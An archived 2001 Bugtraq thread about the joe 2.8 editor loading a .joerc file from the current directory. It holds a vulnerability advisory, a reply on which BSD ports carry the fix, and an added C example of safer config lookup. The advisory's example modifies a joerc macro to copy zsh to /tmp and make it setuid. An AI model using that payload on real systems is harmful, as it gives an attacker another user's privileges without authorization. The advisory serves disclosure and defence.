6152496 2001-02-28 15:13 +0100 /74 lines/ <advisories@WKIT.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28 18:30 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: advisories@WKIT.COM
Recipient: Bugtraq (import) <15685>
Subject: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: advisories@WKIT.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se>

WKIT SECURITY AB
www.wkit.com

TITLE: Joe's Own Editor File Handling Error
ADVISORY ID: WSIR-01/02-02
REFERENCE: http://www.wkit.com/advisories
CVE: GENERIC-MAP-NOMATCH
CREDIT: Christer Öberg, Wkit Security AB
CONTACT: advisories@wkit.com
CLASS: File Handling Error
OBJECT: joe(1) (exec)
VENDOR: Josef H. Allen
STATUS:
REMOTE: No
LOCAL: Yes
VULNERABLE: Joseph Allen joe 2.8

DATE
 CREATED: 26/02/2001
 LAST UPDATED:
 VENDOR CONTACT:
 RELEASE: 28/02/2001

VULNERABILITY DESCRIPTION
 joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
 /usr/local/lib/joerc in that order. Users could be tricked into executing
 commands if they open/edit a file with joe in a directory where other
 users can write.

CONDITIONS
 User using joe in a world/group writable directory.

EXAMPLE
 A user copies the default joerc file to a world writable directory and
 changes

 :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype

 to

 :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype

 Another user opens a file in that directory with joe and runs ispell
 with ^[l; the result is a suid shell in /tmp.

SOLUTION/VENDOR INFORMATION/WORKAROUND

DISCLAIMER
 The contents of this advisory may be distributed freely, provided that
 no fee is charged and proper credit is given.
 Wkit Security AB takes no credit for this discovery if someone else has
 published this information in the public domain before this advisory
 was released. The information herein is intended for educational
 purposes, not for malicious use. Wkit Security AB takes no
 responsibility whatsoever for the use of this information.

ABOUT
 Wkit Security AB is an independent data security company working with
 security-related services and products.

 Wkit Security AB
 Upperudsv. 4
 S-464 72 Håverud
 SWEDEN

 http://www.wkit.com
 e-mail: advisories@wkit.com

(C) 2001 WKIT SECURITY AB
(6152496) ------------------------------------------
Comment in text 6153779 by Brad <brad@COMSTYLE.COM>

6153779 2001-02-28 14:25 -0500 /46 lines/ Brad <brad@COMSTYLE.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28 23:48 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: brad@COMSTYLE.COM
Recipient: Bugtraq (import) <15691>
Comment to text 6152496 by <advisories@WKIT.COM>
Subject: Re: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: Brad <brad@COMSTYLE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSO.4.33.0102281412380.1599-100000@ss5.comstyle.com>

After looking through the patches that OpenBSD/FreeBSD/NetBSD have for
their joe ports, it looks like joe is still vulnerable in the
FreeBSD/NetBSD ports trees, but not in the OpenBSD ports tree as of
Dec 22 1998.

revision 1.3
date: 1998/12/22 03:58:13; author: form; state: Exp; lines: +74 -55
Do not use ./.xxxrc startup file.
Startup files order: ~/.xxxrc, /etc/joe/xxxrc, ${PREFIX}/lib/joe/xxxrc.

// Brad
brad@comstyle.com
brad@openbsd.org

>TITLE: Joe's Own Editor File Handling Error
>ADVISORY ID: WSIR-01/02-02
>REFERENCE: http://www.wkit.com/advisories
>CVE: GENERIC-MAP-NOMATCH
>CREDIT: Christer Öberg, Wkit Security AB
>CONTACT: advisories@wkit.com
>CLASS: File Handling Error
>OBJECT: joe(1) (exec)
>VENDOR: Josef H. Allen
>STATUS:
>REMOTE: No
>LOCAL: Yes
>VULNERABLE: Joseph Allen joe 2.8
>
>DATE
> CREATED: 26/02/2001
> LAST UPDATED:
> VENDOR CONTACT:
> RELEASE: 28/02/2001
>
>VULNERABILITY DESCRIPTION
> joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
> /usr/local/lib/joerc in that order. Users could be tricked into executing
> commands if they open/edit a file with joe in a directory where other
> users can write.
(6153779) --------------------------------(Rewrapped)
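
An added example, not part of either message above and not joe's or any port's source: a C startup-file lookup that follows the order quoted from the OpenBSD port (home directory, then system paths, never the current directory). The ownership and permission checks, the function names rc_trusted and pick_rc, and the /usr/local prefix are assumptions of this example.

```c
/* Added example, not joe's source: pick a startup file without consulting
 * the current directory. Names, checks and PREFIX are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if path is a regular file (not a symlink), owned by uid or root,
 * and not writable by group or others; 0 otherwise. */
int rc_trusted(const char *path, uid_t uid)
{
    struct stat st;
    int ok, fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return 0;
    ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode)
      && (st.st_uid == uid || st.st_uid == 0)
      && (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
    close(fd);
    return ok;
}

/* Try $HOME/.joerc, then each entry of the NULL-terminated sysrc list.
 * Returns 0 with the chosen path in out, or -1 (out is then unspecified). */
int pick_rc(const char *home, const char *const *sysrc, uid_t uid,
            char *out, size_t n)
{
    /* A relative or empty HOME would reintroduce the CWD lookup. */
    if (home && home[0] == '/'
        && (size_t)snprintf(out, n, "%s/.joerc", home) < n
        && rc_trusted(out, uid))
        return 0;
    for (; sysrc && *sysrc; sysrc++)
        if ((size_t)snprintf(out, n, "%s", *sysrc) < n && rc_trusted(out, uid))
            return 0;
    return -1;
}

int main(void)
{
    /* System paths in the order quoted from the OpenBSD port. */
    const char *sys[] = { "/etc/joe/joerc", "/usr/local/lib/joe/joerc", NULL };
    char rc[4096];
    int found = pick_rc(getenv("HOME"), sys, geteuid(), rc, sizeof rc) == 0;
    puts(found ? rc : "no trusted startup file found");
    return 0;
}
```

An editor using a check like this would parse the file from the descriptor it verified rather than reopening the path, so the file cannot be swapped between the check and the read.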